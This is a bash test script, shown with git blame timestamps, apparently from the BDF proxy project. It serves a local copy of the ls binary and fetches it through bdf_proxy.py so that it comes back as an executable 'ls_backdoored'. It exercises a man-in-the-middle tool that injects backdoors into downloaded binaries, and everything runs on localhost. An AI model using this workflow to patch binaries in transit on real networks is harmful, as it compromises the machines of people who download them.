2014-07-31 23:25:54 -04:00
|
|
|
#!/usr/bin/env bash
|
|
|
|
|
|
2014-08-04 12:45:57 -04:00
|
|
|
# This script configures a simple local python webserver
|
|
|
|
|
# and downloads $(which ls) from it through BDF proxy.
|
|
|
|
|
|
2014-07-31 23:25:54 -04:00
|
|
|
#
|
|
|
|
|
# IMPORTANT: set transparentProxy = False before running this test
|
|
|
|
|
#
|
|
|
|
|
|
|
|
|
|
# figure out python executable (especially relevant on arch linux)
|
|
|
|
|
if [ $(which python2.7) ]
|
|
|
|
|
then
|
|
|
|
|
PYTHON=python2.7
|
2014-08-04 12:45:57 -04:00
|
|
|
elif [$(which python2) ]
|
2014-07-31 23:25:54 -04:00
|
|
|
then
|
|
|
|
|
PYTHON=python2
|
|
|
|
|
else
|
|
|
|
|
PYTHON=python
|
|
|
|
|
fi
|
|
|
|
|
|
|
|
|
|
# start up the server
|
2014-08-04 12:45:57 -04:00
|
|
|
echo "[*] Starting up a webserver to serve /tmp"
|
2014-07-31 23:25:54 -04:00
|
|
|
cd /tmp
|
|
|
|
|
$PYTHON -m SimpleHTTPServer 9001 &
|
|
|
|
|
SERVER_PID=$!
|
|
|
|
|
cd -
|
|
|
|
|
|
|
|
|
|
# start the proxy
|
2014-08-04 12:45:57 -04:00
|
|
|
echo "[*] Starting"
|
2014-07-31 23:25:54 -04:00
|
|
|
$PYTHON ./bdf_proxy.py &
|
|
|
|
|
sleep 5
|
|
|
|
|
PROXY_PID=$!
|
|
|
|
|
|
|
|
|
|
# try to backdoor ls
|
2014-08-04 12:45:57 -04:00
|
|
|
echo "[*] Copying "$(which ls)" to /tmp"
|
|
|
|
|
cp $(which ls) /tmp
|
2014-07-31 23:25:54 -04:00
|
|
|
curl 'http://localhost:9001/ls' --proxy1.0 localhost:8080 > ls_backdoored
|
|
|
|
|
rm -f /tmp/ls
|
|
|
|
|
chmod +x ls_backdoored
|
|
|
|
|
|
2014-08-04 12:45:57 -04:00
|
|
|
echo "[*] Shutting down"
|
|
|
|
|
|
2014-07-31 23:25:54 -04:00
|
|
|
# shut down the services
|
|
|
|
|
kill $SERVER_PID
|
|
|
|
|
kill $PROXY_PID
|
2014-08-04 12:45:57 -04:00
|
|
|
|
|
|
|
|
echo "[*] ls_backdoored is available for testing in" $(pwd)
|
